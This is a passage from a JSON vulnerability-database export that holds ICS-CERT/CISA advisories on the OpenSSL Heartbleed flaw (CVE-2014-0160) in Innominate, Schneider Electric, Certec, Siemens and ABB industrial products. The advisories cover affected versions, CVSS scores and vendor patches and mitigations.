"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126065/openssltls-disclose.txt"}], "ics": [{"lastseen": "2020-12-18T03:22:41", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "## OVERVIEW\n\nResearcher Bob Radvanovsky of Infracritical has notified NCCIC/ICS-CERT that Innominate has released a new firmware version that mitigates the OpenSSL HeartBleed vulnerability in the mGuard products.\n\n### **\\--------- Begin Update A Part 1 of 4 --------**\n\nPhoenix Contact branded devices are not likely to be affected, but Phoenix Contact has released a new firmware version to alleviate concern about this vulnerability affecting its products.\n\n### **\\--------- End Update A Part 1 of 4 ----------**\n\nThis vulnerability could be exploited remotely. Exploits that target the OpenSSL Heartbleed vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\n### **\\--------- Begin Update A Part 2 of 4 --------**\n\nThe following mGuard versions are affected:\n\n * mGuard firmware Versions 8.0.0 and 8.0.1\n\nmGuard firmware versions prior to 8.0.0 whether running on Innominate, Phoenix Contact, or other brands of devices are NOT affected.\n\n### **\\--------- End Update A Part 2 of 4 ----------**\n\n## IMPACT\n\nmGuard firmware Versions 8.0.0 and 8.0.1 use the OpenSSL cryptographic library and transport layer security (TLS) implementation Version 1.0.1, which is known to be vulnerable to the HeartBleed vulnerability.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND \n\n### **\\--------- Begin Update A Part 3 of 4 --------**\n\nInnominate is a German-based company that sells products worldwide through its international partners. Innominate was acquired by Phoenix Contact in 2008.\n\n### **\\--------- End Update A Part 3 of 4 ----------**\n\nThe affected products, the mGuard family of products, are industrial security routers. They can be found in many critical infrastructure sectors, including Communications, Healthcare and Public Health, and Critical Manufacturing.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERa\n\nBecause of the unpredictable memory layout of HTTPS communication, it is possible that the private key of the mGuard web graphic user interface could be disclosed. An attacker could use this key to impersonate the authenticated user and perform a man-in-the-middle attack.\n\nCVE-2014-0160b has been assigned to this vulnerability. A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nAll users of the affected mGuard firmware Versions 8.0.0 and 8.0.1 should upgrade to mGuard firmware Version 8.0.2. Innominate recommends users update SSL keys on the affected products after upgrade. The mGuard firmware Version 8.0.2 provides a combined function to replace both the HTTPS and SSH keys.\n\nFor more information regarding this vulnerability and specific instructions on how to install the latest firmware version, please see the Innominate Security Advisory published April 11, 2014, at the following location:\n\n<http://www.innominate.com/data/downloads/software/innominate_security_advisory_20140411_001_en.pdf>\n\n### **\\--------- Begin Update A Part 4 of 4 --------**\n\nPhoenix Contact branded devices are not vulnerable to this issue, as they are using mGuard firmware Version 7.5 that is not affected by HeartBleed. Only mGuard firmware Versions 8.0.0 and 8.0.1 are affected. Phoenix Contact has posted the 8.0.2 firmware patch release on its web site:\n\n<https://www.phoenixcontact.com/mguardsecurity>\n\n### **\\--------- End Update A Part 4 of 4 ----------**\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed April 15, 2014.\n * b. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed April 15, 2014.\n * c. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N, web site last accessed April 15, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-14-105-02A>); we'd welcome your feedback.\n", "edition": 16, "modified": "2018-09-06T00:00:00", "published": "2014-04-17T00:00:00", "id": "ICSA-14-105-02A", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-105-02A", "title": "Innominate mGuard OpenSSL HeartBleed Vulnerability (Update A)", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-18T03:21:42", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "## OVERVIEW\n\nSchneider Electric Wonderware\u2019s Cyber Security Team has identified an OpenSSL Heartbleed vulnerability in the Wonderware Intelligence application, caused by a third-party component. Schneider Electric Wonderware has produced a patch that mitigates this vulnerability.\n\nThis vulnerability could be exploited remotely. Exploits that target this vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nThe latest release of Schneider Electric Wonderware Intelligence Version 1.5 SP1 is not susceptible to the OpenSSL vulnerability. However, users have been known to reinstall Tableau Server, the vulnerable third-party component that is affected. Therefore, Schneider Electric Wonderware has issued a patch and a security bulletin addressing this vulnerability in all versions.\n\nTableaua has been identified as the third-party component vendor that has product vulnerable to the OpenSSL Heartbleed bug. The following Tableau products susceptible to the OpenSSL vulnerability used in the Schneider Electric Wonderware Intelligence product are:\n\n * Tableau Server ver 8.0.6 through 8.0.9\n * \u200bTableau Server ver 8.1.0 through 8.1.5.\n\n## IMPACT\n\nA missing bounds check in the handling of the TLS Heartbeat extension can be used to reveal up to 64kB of memory on a connected device. An attacker who successfully exploits this vulnerability may obtain the user credentials and cryptographic keys used to access the device.\n\nImpact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nSchneider Electric corporate headquarters is located in Paris, France, and maintains offices in more than 100 countries worldwide.\n\nSchneider Electric Wonderware Intelligence is a real-time operations management software distributed by Schneider Electric. Schneider Electric provides automation and information technologies and systems.\n\nAccording to Schneider Electric, Wonderware Intelligence is deployed across several sectors including Critical Manufacturing, Energy, Healthcare and Public Health, and Water and Wastewater Systems. Schneider Electric states that these products are used worldwide.\n\n## VULNERABILITY CHARACTIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERb\n\nThe Heartbleed bug could allow attackers to read unallocated memory of OpenSSL running processes. This could reveal data like transmitted data, passwords, or private keys. The attacker must have network access to the affected devices to exploit this vulnerability.\n\nCVE-2014-0160c has been assigned to this vulnerability. A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).d\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nSchneider Electric Wonderware has issued Security Advisory \u201cTableau OpenSSL Vulnerability (LFSEC00000098),\u201d available at (user registration required to access this site):\n\n<https://wdn.wonderware.com/sites/WDN/Pages/Security%20Central/CyberSecurityUpdates.aspx>\n\nTableau has released several firmware update fixes for the OpenSSL vulnerability. Schneider Electric Wonderware has incorporated and successfully tested Wonderware Intelligence Security patch LFSec00000098 (registration required). Tableau has released the following maintenance Versions 8.1.6 and 8.0.10 on its primary and alternate download sites.\n\nThe Tableau primary customer download site (User registration required to access this site) is located here:\n\n<https://auth.tableausoftware.com/user/login?>\n\nThe Tableau alternate download site, where Version 8.1.6 for Desktop and Server (4/10/2014) is available, is located here:\n\n<https://licensing.tableausoftware.com/esdalt/>\n\nSchneider Electric Wonderware recommends customers who have enabled SSL using Tableau Server Versions 8.0.6 through 8.0.9 or 8.1.0 through 8.1.5 should apply the security update to all nodes where the Tableau Dashboard Server is installed. The process consists of uninstalling the Dashboard Server and installing the new version. The server configuration and published dashboards will be preserved during the installation of the new version.\n\nAny certificates used to configure the SSL communications are revoked, new certificates re\u2011acquired, and used after patching the vulnerability.\n\nAny passwords used for accessing the server should also be changed after applying the update.\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. Tableau Software release notes http://www.tableausoftware.com/support/releases, last accessed May 15, 2014.\n * b. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed May 15, 2014.\n * c. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed May 15, 2014.\n * d. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N, web site last accessed May 15, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-14-135-02>); we'd welcome your feedback.\n", "edition": 16, "modified": "2018-08-27T00:00:00", "published": "2014-05-15T00:00:00", "id": "ICSA-14-135-02", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-135-02", "title": "Schneider Electric Wonderware Intelligence Security Patch for OpenSSL Vulnerability", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-18T03:22:24", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "## OVERVIEW\n\nResearcher Bob Radvanovsky of Infracritical has notified NCCIC/ICS-CERT that Certec has released new libraries that mitigate the OpenSSL Heartbleed vulnerability in atvise scada.\n\nThis vulnerability could be exploited remotely. Exploits that target the OpenSSL Heartbleed vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nCertec reports that the vulnerability affects the following versions of atvise scada:\n\n * atvise scada Versions 2.3 and above.\n\n## IMPACT\n\nAn attacker exploiting the OpenSSL Heartbleed vulnerability may be able to obtain private keys of the target system. The attacker could then use this key to impersonate the authenticated user and perform a man-in-the-middle attack.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nCertec EDV GmbH is based in Austria.\n\nThe affected product, atvise, is web-based human-machine interface supervisory control and data acquisition (HMI SCADA) systems. According to Certec, atvise is deployed in every field of industrial automation. Certec states that these products are used worldwide.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERa\n\nThe atvise scada uses the OpenSSL cryptographic library and transport layer security (TLS) implementation Version 1.0.1, which is known to be vulnerable to the Heartbleed vulnerability.\n\nCVE-2014-0160b has been assigned to this vulnerability. A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPOLIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nCertec has made the new OpenSSL (1.0.1g) libraries available to fix the Heartbleed bug in atvise. The DLLs and the installation instructions can be found on their web site at the following location:\n\n<http://www.atvise.com/en/component/phocadownload/category/2-products?download=181:patch-openssl>\n\nFor more information, please see Certec\u2019s security update at the following location:\n\n<http://www.atvise.com/en/news-events/news/260-important-security-update-heartbleed-bug>\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed April 24, 2014.\n * b. NVD, https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed April 24, 2014.\n * c. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/AU:N/C:P/I:N/A:N, web site last accessed April 24, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-14-114-01>); we'd welcome your feedback.\n", "edition": 17, "modified": "2018-08-23T00:00:00", "published": "2014-04-24T00:00:00", "id": "ICSA-14-114-01", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-114-01", "title": "Certec atvise scada OpenSSL Heartbleed Vulnerability", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-18T03:21:55", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "## OVERVIEW\n\nThis updated advisory is a follow-up to the updated advisory titled ICSA-14-105-03A Siemens Industrial Products OpenSSL Heartbleed Vulnerability that was published April 29, 2014, on the NCCIC/ICS-CERT web site.\n\nSiemens reported to ICS-CERT a list of products affected by the OpenSSL vulnerability (known as \u201cHeartbleed\u201d). Joel Langill of Infrastructure Defense Security Services reported to ICS-CERT and Siemens the OpenSSL vulnerability affecting the S7-1500.\n\n### **\\--------- Begin Update B Part 1 of 3 --------**\n\nSiemens has produced an update and Security Advisory (SSA-635659) that mitigates this vulnerability in each of the affected products listed below.\n\n### **\\--------- End Update B Part 1 of 3 ----------**\n\nThis vulnerability could be exploited remotely. Exploits that target the OpenSSL Heartbleed vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\n### **\\--------- Begin Update **B** Part 2 of 3 --------**\n\nThe following Siemens products are affected:\n\n * eLAN-8.2 eLAN prior to 8.3.3 (affected when RIP is used\u2014update available),\n * WinCC OA only V3.12 (always affected\u2014update available),\n * S7-1500 V1.5 (affected when HTTPS active\u2014update available),\n * CP1543-1 V1.1 (affected when FTPS active\u2014update available), and\n * APE 2.0 (affected when SSL/TLS component is used in customer implementation\u2014update available).\n\n### **\\--------- End Update B Part 2 of 3 ----------**\n\n## IMPACT\n\nA successful \u201cHeartbleed\u201d exploit of the affected products by an attacker with network access could allow attackers to read sensitive data (to include private keys and user credentials) from the process memory.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nSiemens is a multinational company headquartered in Munich, Germany.\n\nThe affected Siemens industrial products are for process and network control and monitoring in critical infrastructure sectors such as Chemical, Critical Manufacturing, Energy, Food and Agriculture, and Water and Wastewater Systems.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### BUFFER ERRORSa\n\nThe Heartbleed vulnerability could allow attackers to read unallocated memory of OpenSSL running processes. This could reveal secrets like transmitted data, passwords, or private keys.\n\nCVE-2014-0160b has been assigned to this vulnerability. A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nThe attacker must have network access to the affected devices to exploit this vulnerability. Siemens recommends operating all products except perimeter devices only within trusted networks.\n\n### **\\--------- Begin Update B Part 3 of 3 --------**\n\nSiemens provides updates for the following products:\n\n * eLAN-8.2. To obtain the update to Version 8.3.3, submit a support request online at:\n\n<http://www.siemens.com/automation/support-request>\n\n * WinCC OA V3.12. The update for WinCC OA 3.12 can be obtained here (login required):\n\n[https://portal.etm.at/index.php?option=com_content&view=category&id=65&layout=blog&Itemid=80](<https://portal.etm.at/index.php?option=com_content&view=category&id=65&layout=blog&Itemid=80>)\n\n * CP-1543-1 V1.1. The update for CP-1543 V1.1 can be obtained here:\n\n<http://support.automation.siemens.com/WW/view/en/92417421>\n\n * APE 2.0. The update for APE can be obtained here:\n\n<http://www.ruggedcom.com/support/appnotes/>\n\n * S7-1500 V1.5. The update for S7-1500 V1.5 can be obtained here:\n\n<http://support.automation.siemens.com/WW/view/en/67295862/133100>\n\n * S7-1500 V1.5. The update for S7-1500 Failsafe V1.5 can be obtained here:\n\n<http://support.automation.siemens.com/WW/view/en/87493352/133100>\n\n### **\\--------- End Update B Part 3 of 3 ----------**\n\nSiemens provides specific advice for mitigating risk in each of the affected products in SSA\u2011635659, which can be found at their web site at the following location:\n\n<http://www.siemens.com/cert/advisories>\n\nThe researcher suggests if HTTPS is not needed to disable it until a patch is available and applied to the vulnerable product/service.\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed April 15, 2014.\n * b. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed April 15, 2014.\n * c. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N, web site last accessed April 15, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-14-105-03B>); we'd welcome your feedback.\n", "edition": 16, "modified": "2018-09-06T00:00:00", "published": "2014-05-20T00:00:00", "id": "ICSA-14-105-03B", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-105-03B", "title": "Siemens Industrial Products OpenSSL Heartbleed Vulnerability (Update B)", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-18T03:21:38", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "## OVERVIEW\n\n### **\\--------- Begin Update A Part 1 of 2--------**\n\nThis updated advisory is a follow-up to the original advisory titled ICSA-14-126-01 ABB Relion 650 Series OpenSSL Vulnerability, that was published May 06, 2014, on the NCCIC/ICS-CERT web site.\n\nABB has identified an OpenSSL vulnerability in its Relion 650 series application and has issued maintenance Release 650 series Ver 1.3.0.1 to mitigate this vulnerability.\n\n### **\\--------- End Update A Part 1 of 2 ----------**\n\nThis vulnerability could be exploited remotely. Exploits that target this vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nThe following ABB Relion versions are affected:\n\n * 650 series Ver 1.3.0\n\n## IMPACT\n\nA missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64 kB of memory on a connected device. An attacker who successfully exploits this vulnerability may obtain the user credentials and cryptographic keys used to access the device.\n\nImpact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nABB is a Swiss-based company that maintains offices in several countries around the world. ABB develops products in multiple critical sectors that are deployed worldwide.\n\nThe affected product, 650 series Ver 1.3.0 family, provides protection, control, measurement, and supervision of power systems specifically supporting bay control, transformer protection, line distance protection, generator protection, busbar protection, and breaker protection. These products support the electrical sector SCADA systems.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFE**Ra**\n\nThe 650 series Ver 1.3.0 devices use the vulnerable version of OpenSSL 1.0.1c. This affects parts of the FTPS protocol and the tool access protocol. Both of these protocols are known to use the OpenSSL component.\n\nCVE-2014-0160b has been assigned to this vulnerability. A CVSS v2 base score: 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a moderate skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\n### **\\--------- Begin Update A Part 2 of 2--------**\n\nThe ABB cybersecurity team has issued a Cyber Security Advisory and software maintenance Release 650 series Ver. 1.3.0.1, in order to provide adequate protection to ABB 650 series customers. ABB recommends that this maintenance release be applied, based on customers risk assessment and exposure of the system.\n\nFor more information, please see the ABB Cyber Security Advisory on the ABB Cyber Security Alerts & Notifications web page at:\n\n<http://www.abb.com/cawp/abbzh254/2c9d1261d9fa1dcfc1257950002e4fbf.aspx>\n\nContact your local ABB customer support to obtain patch and installation support.\n\n### **\\--------- End Update A Part 2 of 2 ----------**\n\nIf user-defined accounts have been used, the passwords of those should be changed. It is also advised that cryptographic keys are regenerated by temporarily changing IP-address or IEC61850 name of the device.\n\nAdditional information is available from the ABB service organizations listed at: <http://www.abb.com/substationautomation>\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed May 06, 2014.\n * b. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed May 06, 2014.\n * c. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N, web site last visited May 06, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-14-126-01A>); we'd welcome your feedback.\n", "edition": 16, "modified": "2018-09-06T00:00:00", "published": "2014-07-08T00:00:00", "id": "ICSA-14-126-01A", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-126-01A", "title": "ABB Relion 650 Series OpenSSL Vulnerability (Update A)", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "threatpost": [{"lastseen": 